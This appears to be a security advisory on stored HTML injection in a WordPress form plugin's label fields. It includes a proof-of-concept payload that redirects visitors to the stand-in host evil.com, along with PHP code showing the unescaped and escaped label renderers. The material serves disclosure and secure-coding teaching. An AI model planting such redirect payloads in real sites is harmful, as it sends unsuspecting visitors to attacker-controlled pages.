Description: The plugin does not sanitize and escape its label fields, which could allow high-privilege users such as admins to perform stored HTML injection. Only users with the unfiltered_html capability can perform this, and such users are already allowed to use JavaScript in posts, comments, etc.; however, the vendor acknowledged and fixed the issue.
Put the following code in any form field label (for example the name, email or message field):
<!DOCTYPE html>
<html>
<head>
<style>
@keyframes moving {
  0% { transform: translateX(0); }
  50% { transform: translateX(100px); }
  100% { transform: translateX(0); }
}
.horizontal-text {
  display: inline-block;
  animation: moving 2s infinite linear;
}
</style>
</head>
<body>
<div class="horizontal-text">Sam</div>
</body>
</html>
or
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta http-equiv="refresh" content="0; URL=https://evil.com">
</head>
<body>
<script>
window.location.href = "https://evil.com";
</script>
</body>
</html>
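The root cause described above is that the stored label is emitted into the page unescaped. The following is an added example, not the plugin's own code, showing a minimal label renderer in the vulnerable form next to the fixed form that escapes at output time; the function names, the label storage shape and the stand-alone shims for WordPress's esc_html()/esc_attr() are assumptions so the snippet runs outside WordPress.

```php
<?php
// Added example (not the plugin's code): a form-label renderer before and after
// output escaping. Function names and the stored-label shape are assumptions.

// Stand-alone shims so the snippet runs outside WordPress; inside WordPress the
// real esc_html() / esc_attr() are already defined and these blocks are skipped.
if (!function_exists('esc_html')) {
    function esc_html(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}

// Vulnerable pattern: the stored label is concatenated into markup verbatim,
// so any HTML or <script> saved in the label is emitted into every page
// that renders the form.
function render_label_unescaped(string $field_id, string $label): string {
    return '<label for="' . $field_id . '">' . $label . '</label>';
}

// Fixed pattern: escape at the point of output. The same stored value is now
// shown literally as text instead of being parsed as markup.
function render_label_escaped(string $field_id, string $label): string {
    return '<label for="' . esc_attr($field_id) . '">' . esc_html($label) . '</label>';
}

// Constructed sample label: the redirect-style payload shape from the advisory.
$stored_label = '<meta http-equiv="refresh" content="0; URL=https://evil.com">'
    . '<script>window.location.href = "https://evil.com";</script>';

echo render_label_unescaped('name', $stored_label), PHP_EOL;
echo render_label_escaped('name', $stored_label), PHP_EOL;

// Self-check: the escaped output must contain no raw tag from the label.
assert(strpos(render_label_escaped('name', $stored_label), '<script') === false);
assert(strpos(render_label_escaped('name', $stored_label), '<meta') === false);
```

Escaping on output is the fix that holds regardless of who saved the label; sanitizing on save (for example with a WordPress sanitization function) is a useful additional layer but does not replace it.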